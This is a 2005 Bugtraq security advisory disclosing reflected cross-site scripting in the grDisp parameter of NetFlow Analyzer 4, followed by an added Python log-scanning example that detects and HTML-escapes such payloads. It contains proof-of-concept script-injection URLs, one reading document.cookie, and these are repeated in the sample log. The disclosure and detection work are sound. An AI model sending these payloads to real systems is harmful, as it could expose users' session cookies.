
List:       bugtraq
Subject:    NetFlow Analyzer 4 XSS Vulnerability
From:       why () nsfocus ! com
Date:       2005-10-18 3:37:24
Message-ID: 20051018033724.21717.qmail () securityfocus ! com

NetFlow Analyzer 4
http://manageengine.adventnet.com/products/netflow/

I encountered Cross Site Scripting vulnerabilities in some files of NetFlow Analyzer 4. With these files, by sending a specially crafted URL you can execute commands on the client side.

____Proof of Concept______

http://192.168.10.7:8080/netflow/jspui/index.jsp?grID=-1&view=groups&grDisp=<h1>test</h1>
http://192.168.10.7:8080/netflow/jspui/index.jsp?grID=-1&view=groups&grDisp=<script>alert("test")</script>
http://192.168.10.7:8080/netflow/jspui/index.jsp?grID=-1&view=groups&grDisp=<script>alert(document.cookie)</script>



Why, why@nsfocus.com
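
The following is an added example, not part of the original post or of the vendor's code: a log check a defender could run to find requests that carry markup in the grDisp parameter of index.jsp, together with the HTML-encoded form the page should emit instead. The log lines are constructed (common log format is an assumption), and the function names are hypothetical.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed access-log lines; the flagged requests mirror the advisory's
# proof-of-concept URLs (one of them double-encoded), plus one benign request.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Oct/2005:03:40:01 +0000] "GET /netflow/jspui/index.jsp?grID=-1&view=groups&grDisp=Branch%20Offices HTTP/1.1" 200 5120
10.0.0.9 - - [18/Oct/2005:03:41:12 +0000] "GET /netflow/jspui/index.jsp?grID=-1&view=groups&grDisp=%3Ch1%3Etest%3C/h1%3E HTTP/1.1" 200 5133
10.0.0.9 - - [18/Oct/2005:03:41:30 +0000] "GET /netflow/jspui/index.jsp?grID=-1&view=groups&grDisp=%253Cscript%253Ealert(document.cookie)%253C/script%253E HTTP/1.1" 200 5170
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
MARKUP_RE = re.compile(r'[<>"\']')  # must never reach HTML output unescaped

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded markup is also seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_grdisp_markup(log_text):
    """Return (client, decoded grDisp) for requests with markup in grDisp."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        parts = urlsplit(target)
        if not parts.path.endswith("/jspui/index.jsp"):
            continue
        for raw in parse_qs(parts.query, keep_blank_values=True).get("grDisp", []):
            value = fully_decode(raw)  # parse_qs already decoded one layer
            if MARKUP_RE.search(value):
                hits.append((client, value))
    return hits

def render_safe(value):
    """The value HTML-entity encoded, as it should appear in the response."""
    return html.escape(value, quote=True)

if __name__ == "__main__":
    for client, value in find_grdisp_markup(SAMPLE_LOG):
        print(client, repr(value), "->", render_safe(value))
```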

